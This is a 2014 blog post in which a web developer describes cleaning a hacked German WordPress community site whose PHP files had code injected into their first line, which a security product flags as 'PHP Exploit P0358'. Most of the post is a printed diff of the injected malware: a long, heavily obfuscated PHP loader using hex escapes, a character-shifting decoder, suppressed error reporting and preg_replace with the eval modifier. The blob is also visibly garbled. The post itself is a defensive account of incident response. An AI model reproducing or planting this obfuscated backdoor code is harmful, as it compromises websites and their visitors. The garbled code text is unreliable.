Blog Archives - sascha.us

Clean WordPress from PHP Exploit P0358

Sascha Endlicher, M.A. — Mon, 21 Jul 2014 11:03:22 +0000

Last weekend, the website of a popular German WordPress community has been hacked. The owner of the site asked for help via the official Facebook fanpage. It was on a Saturday afternoon, it was hot outside, the best possible weather to spend time at the pool or lake and of course, the worst time to get hacked. In the back of my head there was still buzzing around an article I had read recently about the German WordPress community. The article was basically saying that people do not return enough to the community for what they get. So for me there was no way to let the operator of an aesthetic WordPress community site suffer (even if it was not the German WordPress community). They have provided me with quality content over the last few months, so I decided to call and offer my help.

The hack was a little different than what you typically see done to WordPress sites. It wasn’t a defacement where a fanatic would try to broadcast his fanatical messages to the visitors of the site. In this particular case, I found a code injection in the first line of some PHP files, but the code was dynamic and looked different if you’d compare compromised files with each other. So I was trying to find a signature of the code. I contacted the developer of a wonderful and highly esteemed security suite. My goal was to get more information about the exploit, because the developer’s software detects the exploit as PHP Exploit P0358, but of course I got no answer on the weekend. So I ran a diff on two contaminated files. The result looked like this:

$xcaudxkspk$intygvhpad = ‘%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>11<%x5c%x78%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%25)sf%x5c%x7878pmpusut)tpqss5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%hA%x5c%x7827pd%x5c%x78256>2*!%x5c%x7825zmg%x5c%x7825)!gj!~>}R;msv}.;%x5c%x782f#%xmjg}[;ldpt%x5c%x7825}K;%x5c%x5c%x7825j:>>1*!%x5c%x7825b:fh%x5c%x7825:<**#57]3>1%x5c%x7825s:8223}!+!<+{e%x5c%x7825+*!*+fepdfe{if((function_exists(”%x6f%142%x5f%181]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]opd%x5c%x7860ufh%x5c%x7860f5c%x7824*!#]y3d]51]y35]256]y76]72]y3d]56985:6197g:74985-rr.93e:55%x5c%x785c%x5c%x7825j:^‘5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%svmt+fmhpph#)zbssb!-#}#)fepmqnj!bs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+q825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usx7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x7860hA%x5c%x7827pd%x5c%x78256<%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825t5]Ke]53Ld]53]Kc]55Ld]55#*<%x5825))!gj!<*#cd2bge56+9938687f_*#fmjgk4%x5c%x7860{6~62q%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5×782f#M5]DgP5]D6#<%x5cx5c%x7824-%x5c%x7824*j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!c%x7824-%x5c%x7824*!}%x5c%x7827;!>>>!}_;gvc%825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]827&6<%x5c%x787fw6*%x5c%x787f_*#[k2x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%xx5c%x7825Z<^2%x5c%x785c2b%x5c%x78vg}{;#)tutjyf%x5c%x7860opju5<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)s5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,<.4%x5c%x7860hA%x5c%x7827pd%x]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28825b:>%x5c%x7825s:%x5ussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x5nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5#]y76]277]y72]265]y39]271]y83]256]y7%x5c%x782f!#0#)idubn%x5j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5cx7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-buR;2]},;osvufs}%x5c%x7827;mnui}&;zeC%x5c%x7827pd%x5c%x782gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsx5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782fj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6!%x5c%x7825i%x5c60sfqmbdf)%x5c%x7825%x5c%x782%x7827u%x5c%x7825)7fmji%x5c%x78786!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmj{hnpd19275fubmgoj{h1:|:5%156%x61″])))) { $GLOBALS[“%x61%156%x75%156%x61”]=1; functio6-%x5c%x7878r.985:52985-t.98]K4]65]D8]8bs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)825)!gj!|!*1?hmg%x5cJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x7825256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)umg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x~!!%x5c%x7825s:N}#-%x5c2fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%%x782272qj%x5c%x7825)7gj6<**2qj%xgpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*q}Z;^nbsbq%x5c%x7825%72]58y]472]37y]672]48y]#>L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%xx5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-f#0#%x5c%x782f*#npd%x#@#7%x5c%x782f7^#iubq#%x5c7878:-!%x5c%x7825tzw%x60439275ttfsqnpdov{h19275j{hnpd19275fu7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825zb%x5c%x7825Z<#opo#>b%x5c%x7825!*oV;hojepdoF.uofuopD#)sfebfI{***b%x5c%x7825)sf%x5c%x7878pmx5c%x78256<#o]1%x5c%x5c%x782f#)rrd%x5c%x782f#00_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782×7825w:!>!%x5c%x78246767~6!%x5c%x7825i%x5c%x785c2^!tus%x5c%x7860sfqmbdf5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#8;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5cW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%xNULL); }c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cn fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_replace)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x782%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2%x5c%x7824]y8%x5c%x7824-%x5c%x782×7860ufldpt}X;%x5c%x7860msvdosvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!h%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825n%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>7**111127-K)ebfsX%x5c%4-%x5c%x7824%x5c%x785c%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%”,”%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!x78257-K)fujs%x5c%x7878X6<#986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<4#-!OVMM*<%x22%51%x29%51%x29%73″, 5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y62]38y]572]48y]#>m%x7860%x5c%x7825}X;!sp)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmd7827pd%x5c%x78256.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x87f<*X&Z&S{ftmfV%x5c%x787f<#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x782%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256^#zsfvr#%x5c%x785cdovg}{;#)tutjyf%x5c%x7860opju6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%xx7825ggg!>!#]y81]273]y76]258]y6g]273]y%x7825l}S;2-u%x5c%x7825!–%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{7-UFOJ%x5c%x7860GB)fub3)%x5c%x7825cB%x5c%x7osvufs!*!+A!>!{e%x5c%x7825)!5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824%x5c%x7825fdy!%x5c%x25j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%XA6~6%x5c%x782f7&6|~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x78o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%1<%x5c%x7825j=6[%x5pcotn+qsvmt+fmhpph#)zbssb!-#}#)f1]y35]274]y4:]82]y3:]62]y4c#!#]y84]275]y83]273]y76]277#32n%x5c%x7825<#35c%x7860msvd}+;!>!}%x4]26%x5c%x7824-%x5c%x7824<%x5c%x782825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x7y7d]252]y74]256#>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825×7825r%x5c%x7878W~!Ypp2)%x5c%5c%x7825=*h%x5c%x7825)m%x5c%x7}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c#2#%x5c%x782f#%x5c%x7825#%x)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%epmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x785c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M%x61%171%x5f%155%x61%160%x28%42%x66%1524-%x5c%x7824!>!fyqmpef)#%xs%x5c%x7825<#462]47y]252]18y]pusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobx5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860]368]322]3]364]6]283]427825ff2!>!bssbz)%x5c%x7824]25%x5c%x60TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%xfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5cx7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2825t::!>!%x5c%x7824Ypp825):fmji%x5c%x7878:<##:>:h%x5c%xx7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!h*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gjsbut%x5c%x7860cpV%x5cx7825z-#:#*%x5c%x78247824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%tsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x#65,47R25,d7R17,67R37,#%x5c%x78p%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%xufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjuw%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c63%x74%141%x72%164″)function c%x787f;!opjudovg}k~~9{d%x5c%x7825f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x:osvufs:~928>>%x5c%x7822:ftmbg39*K78:56985:6197g:74985-rr.93e:559bE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5<*9-1-r%x5c%x7825)s%x5c%x782W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73″, NULL); }|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x78uopd%x5c%x7860ufh%x5c%x7860fZ6<.5%x5c%x7860hA%x5c%^,%x5c%x7825b:%x5c%x782860gvodujpo)##-!#~<#%x5c%x782f%x5824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%NFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%2f#@#%x5c%x782fqp%x5c%xesp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-c%x7822)!gj}1~!<2p%x5c%x7×7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|5c%x7860QUUI&e_SEEB%x5c%x7860FUPc%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x782556^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7h%x5c%x7825)j{hnpd!opjudovg!787fm%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op5s:%x5c%x785c%x5c%x7825j:^s%x5c%x7825<#46×782fq%x5c%x7825>U<#16,47R57,2%x5c%x7825)3of)fepdof%x5c%x7860578273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%s)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-364]6]283]427]36]373P6]36]73]8#%x5c%x7824-%x5c%x7824-tusqoepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x8]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y8562]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!t00~:!bssbz)%x5c%x7824]25%x57827!hmg%x5c%x7825)!gj!|!*AZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M62f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%xe7y]#>n%x5c%x7825<#372]58y]4c%x7825)utjm!|!*5!%x5c%xx6f%142%x5f%163%x74%141%x72%164″) && (!isset($GLOBALS[“%x61%156%x75%5c%x782f#o]#%x5c%x782f*)323zbe!%x787fw6*%x5c%x787f_*#ujojRk3%x5c%h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-5c%x7825fdy)##-!#~<%x5c%x7825h00#7825!<*::::::-111112)eo342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboeutRe%x5c%x7825)Rd%x5j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sut7-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x]273]y72]282#!#]y84]275]y83]248]y8c%x78256}&;!%x787f%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x7825s:cvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7ssbnpe_GMFT%x5c%x7860QIQ87fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofu8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f77825!<5h%x5c%x7825%x5c%x782825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x%x5c%x7825w6Z6<.5%x5c%x7860))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!!2p%x5c%x7825Z<^2%x5c%x785c]36]373P6]36]73]83]238M7]3%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860f%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>25c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3347825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFN75]y7:]268]y7f#!%x5c%x782400~:q%x5c%x7825<#762]67y]5>>%x5c%x7822!ftmbg)!gj<*#k#)u5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824:iuhofm%x5c%25w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x76]271]y7d]252]y74]256#2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopdfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]8782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x785bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#dovg)!gj!|!*msv%x5c%x7825)}k~~~!#]y76]277]y72]/(.*)/epreg_replacevsvuvovphv’; $lafezcehhd%x7825rN}#QwTW%x5c%x7825hx7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu42%x2c%163%x74%162%x5f%163%x70%154%utcvt)fubmgoj{hA!osvufs!~<3,j%825)!gj!<2,*j%x5c%x7825-#1b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x78pc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%#)fepmqyf%x5c%x7827*&7-n%x5cx78256<*17-SFEBFI,6<(!isset($GLOBALS[“%x61%156%x7#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#7#@#7%x5c%x782f7^#iubq#%x5c%x7858]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]6)fepmqyfA>2b%x5c%x7825!<*qc%x7860{66~6<&w6<%x5c%x787fw6dz>#L4]275L3]248L3P6L1M5|:**t%x5c%x7825)m%x5c%x7eTQcOc%x5c%x782f#00#W~!Ydrr)%2^-%x5c%x7825hOh%x5c%x782f25>%x5c%x782fh%x5c%x78*CW&)7gj6<*doj%x5c%x78257-C)fepmq5j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>11<%x5c%x782!*)323zbek!~!>2*!%x5c%x7825z>32>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x78njA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x75t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7×5c%x7825r%x5c%x7878Bsfuvso!sb>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#!ssbnpe_GMFT%%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7×5c%x7825}&;ftmbg}%x5c%x7d%160%x6c%157%x64%145%x28%141%x72*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)q%x5c%x7825:>:r%x5c%x7825:5c%x78256!%x5c%x78242178}527}7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x52]47y]252]18y]#>q%x5c%x7825<#762]67y]562]32f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^x5c%x7878;0]=])0#)U!%x5c%x7827{fw6*CWtfs%x5c%x7825)7gif((function_exists(”%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%5025)+opjudovg+)!gj+{e%x5c%x7D!-id%x5c%x7825)uqpuftpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x78c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878p85cSFWSFT%x5c%x7860%x5c%x7825}X>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x51?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)8256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%@error_reporting(0); preg_replace(”%x2f%50%x2e%52%x29%57%x65″,”%x65%f#p#%x5c%x782f%x5c%x78y6g]273]y76]271]y7d]252]y74]256#j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%uvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782c%x785c%x5c%x7825j:.25c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x7%x7825j^%x5c%x7824-%x5c%x7824tvctu825%x5c%x787f!~!<##!>!2p%72]y3d]51]y35]274]y4:]82]y3:]87f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~!%x5c%x78247860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824-!%25:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%xc%x787f!b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>febfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x5c%x7825w6Z6<.2%x5c%x78-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x78K9]78]K5]53]Kc#<%x5c78257;utpI#7>%x5c%x782p%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]!#]y3d]51]y35]256]y76]Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x7%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofx5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#11<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x782-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x77ftbc%x5c%x787f!|!*uyfu%xw!>!#]y84]275]y83]273]y76]277#<%x5c%x782*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78×7827pd%x5c%x78256!fyqmpef)#%x5c%x7824*#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM?]_%x5c%x785c}X%x5c%x7824!#]y76]x5c%x7860QIQ&f_UTPI%x]#-bubE{h%x5c%x7825)tpqsut>j%xc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2%x5c%x782f7&6|7**111127-K)ebfsX%x5c166%x61%154%x28%151%x6%x5c%x7860msvd},;uqpuft%x5c%x7860msfjfgg($n){return chr(ord($n)-1);} dovg)!gj!|!*msv%x5c%x7825)}k~~~ = explode(chr((208-164)),’668,35,7326,55,1056,59,3462,69,2882,27,4107,67,6304,38,9229,52,67,67,1625,59,2785,33,8582,27,214,58,5854,60,4496,64,7867,26,8984,38,4426,70,5259,33,4005,22,907,57,4241,27,5346,39,2677,21,9878,50,1316,56,9613,63,4927,22,6603,50,1684,33,8932,52,2448,29,8441,60,1955,26,4690,62,9193,36,3420,42,8824,49,7056,39,996,60,5059,35,4781,39,2930,52,9456,70,9076,58,1276,40,7735,43,7412,34,464,28,7893,33,8330,67,773,27,523,28,3731,28,6066,46,7778,38,5721,21,6865,54,7219,56,4752,29,9968,38,4174,67,3811,50,1372,67,162,52,6764,62,349,38,1871,63,8248,58,1256,20,3941,64,7679,56,8178,70,9710,60,8704,27,1210,46,1717,68,7126,43,8501,27,1934,21,2698,26,4560,52,1510,60,9676,34,7573,23,1154,56,2649,28,6398,39,2549,24,5422,32,6178,65,134,28,7659,20,9399,27,8657,47,8306,24,1570,55,6437,45,2982,42,2573,47,5937,70,6139,39,5561,68,1785,20,7973,21,4406,20,492,31,964,32,7994,67,3759,52,5292,54,2003,38,9426,30,5094,50,634,34,7446,43,4970,28,9305,29,6954,21,8061,52,444,20,4612,27,6826,39,7095,31,1462,48,9557,56,2620,29,7275,51,8757,67,6919,35,5144,28,3321,57,4858,25,6112,27,7381,31,10040,66,2385,63,7816,51,5491,70,3637,61,9134,59,2724,61,579,21,2272,53,2477,23,8528,54,6036,30,6731,33,5686,35,1805,25,6369,29,9281,24,4386,20,9334,65,4998,61,2107,43,5829,25,6506,34,3576,61,4027,22,3861,42,3270,51,10006,34,6975,21,3236,34,3531,45,3698,33,5742,35,3191,45,2500,49,4883,44,2150,54,3024,47,6342,27,800,56,5454,37,6709,22,4949,21,5777,52,2818,64,3141,28,4049,58,6007,29,6653,56,3378,34,2204,68,7489,51,4639,51,9928,40,2909,21,856,26,5914,23,1115,39,7926,47,3169,22,8397,44,6243,61,4342,44,9770,67,387,57,3903,38,5172,41,7169,50,7540,33,9022,54,6482,24,8731,26,703,70,7596,63,8609,48,4268,40,1439,23,0,67,5213,46,551,28,600,34,8113,65,882,25,8873,59,5385,37,2325,60,328,21,5629,57,6540,63,1981,22,272,56,1830,41,6996,60,4820,38,9526,31,2041,66,3071,70,9837,41,4308,34,3412,8′); 